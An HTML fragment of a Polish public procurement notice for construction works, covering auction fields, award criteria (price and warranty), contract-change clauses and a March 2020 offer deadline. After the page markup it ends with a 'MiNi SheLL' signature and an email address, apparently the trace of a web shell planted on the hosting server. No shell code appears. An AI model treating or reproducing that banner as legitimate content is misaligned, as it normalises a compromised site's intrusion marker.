id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Przedłużony okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w razie:1) Konieczności wykonania dodatkowych robót budowlanych przez dotychczasowego Wykonawcę nieobjętych zamówieniem podstawowym w sytuacji wskazanej w art. 144 ust. 1 pkt 2) Pzp;2)	Konieczności realizacji robót wynikających z wprowadzenia w dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu budowlanego, wynikających z art. 36a ust. 5 ustawy Prawo budowlane dokonanych zgodnie z zapisami art. 36a ust. 6 ustawy Prawo budowlane.3) Konieczności wykonania robót naprawczych (po poprzednim wykonawcy) innych niż przewidziana naprawa wykonanych podkładów betonowych i pogrubienie tynku w przypadku wystąpienia znacznych (ponadnormatywnych) nierówności i odchyłek powierzchni ścian wymurowanych przez poprzedniego wykonawcę, 4) Konieczności zmiany sposobu wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany w przypadku:a)	stwierdzenia wad bądź wprowadzenia zmian w załączonych do SIWZ projektach wykonawczych, skutkujących koniecznością dokonania poprawek lub uzupełnień, w tym dokonania zmian w rozwiązaniach projektowych na podstawie art. 23 ust. 1 ustawy Prawo budowlane, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;b)	celowości lub konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych, technologicznych lub materiałowych niż wskazane w projektach wykonawczych,c)	w razie niedostępności na rynku materiałów lub urządzeń wskazanych w projektach wykonawczych stanowiących opis przedmiotu zamówienia.5)	Konieczności graniczenia zakresu rzeczowego przewidzianego w dokumentacji stanowiącej opis przedmiotu zamówienia w sytuacji, gdy ich wykonanie stało się nie korzystne dla Zamawiającego lub będzie zbędne do prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi przepisami wykonania przedmiotu zamówienia. Ustala się limit rezygnacji z wykonywania części robót przewidzianych w projektach wykonawczych na poziomie 15% szacunkowej wartości przedmiotu umowy netto;.6) Zmiany ustalonych terminów wykonania (skrócenie, wydłużenie) Etapu I jak i Etapu II przedmiotu zamówienia będących następstwem: a)	działań osób trzecich (w tym wykonawcy pokrycia dachowego);b)	przestojów lub opóźnień wywołanych prowadzonymi równolegle pracami związanymi z wykonaniem przekryć dachowych przez innego Wykonawcę.c)	wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających prawidłowe wykonanie robót z uwagi na konieczność przestrzegania reżimów technologicznych określonych normami lub innymi przepisami wymagającymi konkretnych warunków atmosferycznych, Wykonawca zmuszony jest przerwać realizację robót a nie jest możliwe w tym czasie wykonywanie innych prac i nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność. W takiej sytuacji termin realizacji umowy ulega wydłużeniu o uzasadniony powyższymi okolicznościami okres;d)	wystąpienia okoliczności o których mowa w ust. 3, pkt. 1 - 5 mających wpływ na termin realizacji zamówienia.7) Zmiany wynagrodzenia (podwyższenie lub obniżenie) w przypadku zmiany: a)	prawa o charakterze bezwzględnie obowiązującym w zakresie określonym w art. 142 ust. 5 ustawy Pzp pod warunkiem, że Wykonawca wykaże wpływ w/w zmiany na koszty wykonania zamówienia tj.:- zmiany stawki podatku od towarów i usług,- zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalanej zgodnie z przepisami o minimalnym wynagrodzeniu,-	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,-	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (w skrócie: PPK).b)	zaistnienia sytuacji nadzwyczajnej i nieprzewidywalnej za którą należy uznać nagły i znaczący wzrost cen materiałów i usług budowlanych, których nie można było przewidzieć w normalnych okolicznościach (obiektywnie) i uwzględnić w wysokości wynagrodzenia wskazanego w ofercie w ramach zwykłego ryzyka kontraktowego pod warunkiem, że Wykonawca wykaże wpływ w/w zmian na koszty wykonania zamówienia opartych o wiarygodne np. urzędowe dane (GUS) - wskaźnik (roczny lub c)	kwartalny) ogłaszany w Dzienniku Urzędowym przez Prezesa GUS, który oznacza wskaźnik cen dóbr inwestycyjnych lub wskaźnik zmian cen produkcji budowlano – montażowej lub w oparciu o indywidualne badanie statystyczne dla poszczególnych dóbr w trybie ustawy o statystyce publicznej z dnia 29 czerwca 1995 roku. Maksymalne wynagrodzenie wynikające ze wzrostu cen (maksymalna wysokość waloryzacji) nie może przekroczyć 4% wartości wynagrodzenia netto za roboty wykonane w roku 2021 i 2022. d)	wystąpienia okoliczności mających wpływ na zmianę wynagrodzenia o których mowa w ust. 3, pkt. 1- 5.8)	Zmiany sposobu rozliczania Umowy lub zasad dokonywania płatności na rzecz Wykonawcy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-03-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com